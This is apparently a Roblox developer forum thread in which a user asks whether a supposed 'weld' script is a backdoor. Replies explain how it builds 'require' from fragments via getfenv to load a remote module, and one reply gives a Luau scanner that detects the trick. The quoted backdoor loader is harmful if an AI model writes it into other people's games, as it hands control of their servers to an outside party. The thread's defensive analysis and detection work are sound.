Is this a backdoor virus?

I just found a server script that looked suspicious and used “getfenv”, so I think it was a backdoor virus. Apparently it’s supposed to be a WELD script for my baseplate, but I don’t trust it.

So tell me scripting experts:

Is this a backdoor virus script?

--weld script writen by atrition
pcall(function()
    local fenv = getfenv
    local ADDR = 0x19F996F0A;
    local INST = "re"
    pcall(fenv()[INST.."qui"..INST](ADDR)) 
end)

3 Likes
  1. Has getfenv or require with an external asset ID

  2. In a script you didn’t create and you don’t trust all too well

  3. More specifically, a commonly known “weld” back door script

Yep

5 Likes

Thanks. I don’t see how this script could weld my baseplate at all.

2 Likes

Notice how [INST.."qui"..INST] spells “require”. Trust me, you don’t wanna import random closed source scripts.

4 Likes

If it were a ‘weld script’, the developer would write it and would not encrypt it using variables (and it would be possible to write a script), and it’s somehow very strange that instead of the ID for the request there is a different number. If there was an ID there, you could check this asset, and if it has no ratings or it is poorly rated and the comments are bad, it would be a virus. I’m not very good at scripting, but that’s what I think.

1 Like

It’s a way to keep the script from appearing in the global script search feature when “req”, “require” etc. is searched.

Looking at the source code of the module this script loads, for whatever reason it’s sending the IP address of the server the script is running on to some website.

1 Like
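
The search evasion described in the post above can be countered by folding string concatenations before matching. The following Luau heuristic is an added example, not part of the thread or any poster's code; `scanSource`, `SAMPLE` and the hex value in the sample are hypothetical names and constructed data.

```lua
-- Added example. SAMPLE is constructed; its hex number is a placeholder, not a real asset ID.
local SAMPLE = [[
pcall(function()
    local fenv = getfenv
    local ADDR = 0x1234ABCD;
    local INST = "re"
    pcall(fenv()[INST.."qui"..INST](ADDR))
end)
]]

-- Hypothetical helper: returns a list of findings for one script source.
local function scanSource(src)
    local findings, vars = {}, {}
    -- Record simple string bindings such as: local INST = "re"
    for name, value in src:gmatch('local%s+([%a_][%w_]*)%s*=%s*"([^"]*)"') do
        vars[name] = value
    end
    -- Replace those names with their literals, then fold "a".."b" into "ab"
    local folded = src:gsub("[%a_][%w_]*", function(id)
        if vars[id] then return '"' .. vars[id] .. '"' end
    end)
    local n
    repeat
        folded, n = folded:gsub('"([^"]*)"%s*%.%.%s*"([^"]*)"', '"%1%2"')
    until n == 0
    if src:find("getfenv", 1, true) then
        table.insert(findings, "uses getfenv")
    end
    -- "require" exists only after folding, so a plain-text search would miss it
    if folded:find('"require"', 1, true) and not src:find('"require"', 1, true) then
        table.insert(findings, 'string fragments concatenate to "require"')
    end
    if src:find("require%s*%(%s*%d") then
        table.insert(findings, "require called with a numeric asset ID")
    end
    return findings
end
print(table.concat(scanSource(SAMPLE), "; "))

-- In Roblox Studio's command bar `game` exists: sweep every script in the place.
if game then
    for _, inst in ipairs(game:GetDescendants()) do
        if inst:IsA("LuaSourceContainer") then
            local ok, src = pcall(function() return inst.Source end)
            local hits = ok and scanSource(src) or {}
            if #hits > 0 then
                warn(inst:GetFullName() .. ": " .. table.concat(hits, "; "))
            end
        end
    end
end
```

The checks are heuristics: a hit means the script deserves a manual read, and a clean result does not prove a script is safe.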

Thanks to everyone who replied to this thread!

You all REALLY saved me. Who knows how long I’ve had that script in my experience.

I’ve removed all the backdoors from the experience.
I also looked at some tutorials on the DevForum to search for others, just in case, and I found another, which I also removed.

Once again, thanks for your help everyone!

Yup and here’s the source

(1) cool stuff - Roblox

Always erase/disable scripts from Explorer that you think are suspicious.

1 Like